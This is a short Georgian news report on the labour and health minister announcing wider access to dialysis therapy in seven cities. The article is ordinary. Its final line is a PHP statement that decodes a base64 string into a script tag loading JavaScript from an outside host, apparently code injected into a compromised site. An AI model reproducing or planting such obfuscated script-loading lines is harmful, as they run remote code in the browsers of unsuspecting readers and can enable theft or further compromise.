celsiusi
ავერსი საქკაბელი
მომდევნო 2 თვეში, დიალიზის თერაპია, დამატებით, 7 ქალაქში იქნება ხელმისაწვდომი - განცხადება ამის შესახებ, ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა მთავრობის სხდომის შემდეგ გააკეთა. 
 
ზურაბ აზარაშვილის ინფორმაციით, უკვე მიღწეულია შეთანხმება 4 კერძო კლინიკასთან. სწორედ ისინი შესთავაზებენ, 4 სხვადასხვა ქალაქში, ბენეფიციარებს დიალიზის თერაპიას. ამასთან, პაციენტები, მათი სიცოცხლისათვის აუცილებელ მომსახურებას მიიღებენ თიანეთში, მესტიასა და ამბროლაურში.
 
„ჩვენ ყველა ქალაქში შევისწავლეთ, ამ კუთხით, არსებული სიტუაცია - პირველ ეტაპზე, შევთანხმდით, რომ თიანეთი, მესტია და ამბროლაური ყველაზე კრიტიკული ლოკაციებია. ამასთან, 4 კერძო კლინიკასთან მივაღწიეთ შეთანხმებას, დამატებით, 4 ქალაქში იყოს დიალიზის სერვისი - მომდევნო 2 თვის განმავლობაში, ჯამში 7 ქალაქში, სრულად იქნება ხელმისაწვდომი დიალიზის თერაპია“, - განაცხადა ზურაბ აზარაშვილმა.  
 
ცნობისთვის, აღნიშნული სერვისები „დიალიზის და თირკმლის ტრანსპლანტაციის პროგრამის“ ფარგლებში იხსნება, რომელსაც ოკუპირებული ტერიტორიებიდან დევნილთა, შრომისა და ჯანმრთელობის დაცვის სამინისტრო ახორციელებს.
 
 
738
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");